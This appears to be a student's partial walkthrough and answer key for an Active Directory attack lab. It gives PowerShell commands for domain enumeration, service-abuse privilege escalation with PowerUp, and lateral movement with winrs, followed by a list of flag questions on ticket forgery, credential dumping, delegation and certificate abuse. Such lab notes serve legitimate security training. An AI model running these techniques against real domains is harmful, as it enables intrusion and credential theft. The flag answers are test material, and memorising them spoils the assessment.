.

Learning Objective - 1 Student VM SID of the member of the Enterprise

Admins group
~> Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

#Answer: S-1-5-21-335606122-960912869-3279953914-500

2. Learning Objective - 2 Student VM Display name of the GPO applied on

StudentMachines OU
~> (Get-DomainOU -Identity StudentMachines).gplink
~>Get-DomainGPO -Identity '{XXXXXXX}'

#Answer: Students

3. Learning Objective - 3 Student VM ActiveDirectory Rights for RDPUsers group

on the users named ControlxUser
~> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
~>Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match
"RDPUsers"}

#Answer: GenericAll

4. Learning Objective - 4 Student VM Trust Direction for the trust between

dollarcorp.moneycorp.local and eurocorp.local
~>Get-ForestDomain -Verbose
~>Get-DomainTrust

#Answer: TrustDirection : Bidirectional

5. Learning Objective - 5 Student VM Service abused on the student VM for

local privilege escalation
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\PowerUp.ps1
~> Invoke-AllChecks
~> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student729' -
Verbose (logout & in)
#Answer:AbyssWebServer
#Run cmd as admin after logging out
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~>. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
~>Find-PSRemotingLocalAdminAccess
#Answer:Find-PSRemotingLocalAdminAccess
#Answer:dcorp-std729
dcorp-adminsrv
#So we have access on dcorp-adminsrv connect by
~> winrs -r:dcorp-adminsrv cmd
~> set username
~> set computername

6. Learning Objective - 5 Student VM Script used for hunting for admin

privileges using PowerShell Remoting
~>
~>
~>

#Answer:Find-PSRemotingLocalAdminAccess
7. Learning Objective - 5 dcorp-ci Jenkins user used to access Jenkins web
console

8. Learning Objective - 5 dcorp-ci Domain user used for running Jenkins

service on dcorp-ci

9. Learning Objective - 6 Student VM Collectionmethod in BloodHound that

covers all the collection methods

10. Learning Objective - 7 dcorp-mgmt Process using svcadmin as service account

11. Learning Objective - 7 dcorp-mgmt NTLM hash of svcadmin account

12. Learning Objective - 7 dcorp-mgmt We tried to extract clear-text

credentials for scheduled tasks from? Flag value is like lsass, registry,
credential vault etc.

13. Learning Objective - 7 dcorp-adminsrv NTLM hash of srvadmin extracted

from dcorp-adminsrv

14. Learning Objective - 7 dcorp-adminsrv NTLM hash of websvc extracted from

dcorp-adminsrv

15. Learning Objective - 7 dcorp-adminsrv NTLM hash of appadmin extracted

from dcorp-adminsrv

16. Learning Objective - 8 dcorp-dc NTLM hash of krbtgt

17. Learning Objective - 8 dcorp-dc NTLM hash of domain administrator -

Administrator

18. Learning Objective - 9 dcorp-dc The service whose Silver Ticket can be
used for winrs or PowerShell Remoting

19. Learning Objective - 10 dcorp-dc Name of the account who secrets are used
for the Diamond Ticket attack

20. Learning Objective - 11 dcorp-dc Name of the Registry key modified to

change Logon behavior of DSRM administrator

21. Learning Objective - 12 dcorp-dc Attack that can be executed with

Replication rights (no DA privileges required)

22. Learning Objective - 13 dcorp-dc SDDL string that provides studentx same
permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string
from (A;CI;Permissions String;;;SID)

23. Learning Objective - 14 dcorp-dc SPN for which a TGS is requested

24. Learning Objective - 15 dcrop-appsrv Domain user who is a local admin on
dcorp-appsrv

25. Learning Objective - 15 dcrop-appsrv Which user's credentials are

compromised by using the printer bug for compromising dollarcorp

26. Learning Objective - 16 dcorp-adminsrv Value of msds-allowedtodelegate to

attribute of dcorp-adminsrv

27. Learning Objective - 16 dcorp-adminsrv Alternate service accessed on

dcorp-dc by abusing Constrained delegation on dcorp-adminsrv

28. Learning Objective - 17 dcorp-dc Computer account on which ciadmin can

configure Resource-based Constrained Delegation

29. Learning Objective - 18 Student VM SID history injected to escalate to

Enterprise Admins

30. Learning Objective - 19 mcorp-dc NTLM hash of krbtgt of moneycorp.local

31. Learning Objective - 20 eurocorp-dc Service for which a TGS is requested from
eurocorp-dc
32. Learning Objective - 20 eurocorp-dc Contents of secret.txt on eurocorp-dc
33. Learning Objective - 21 dcorp-dc Name of the AD CS template that has
ENROLLEE_SUPPLIES_SUBJECT
34. Learning Objective - 21 dcorp-dc Name of the AD CS template that has EKU
of Certificate Request Agent and grants enrollment rights to Domain Users
35. Learning Objective - 21 dcorp-dc Name of the CA attribute that allows
requestor to provide Subject Alternative Names
36. Learning Objective - 21 dcorp-dc Name of the group that has enrollment
rights on the CA-Integration template
37. Learning Objective - 22 dcorp-mssql First SQL Server linked to dcorp-mssql
38. Learning Objective - 22 dcorp-mssql Name of SQL Server user used to establish
link between dcorp-sql1 and dcorp-mgmt
39. Learning Objective - 22 dcorp-mssql SQL Server privileges on eu-sql
40. Learning Objective - 22 dcorp-mssql Privileges on operating system of eu-sql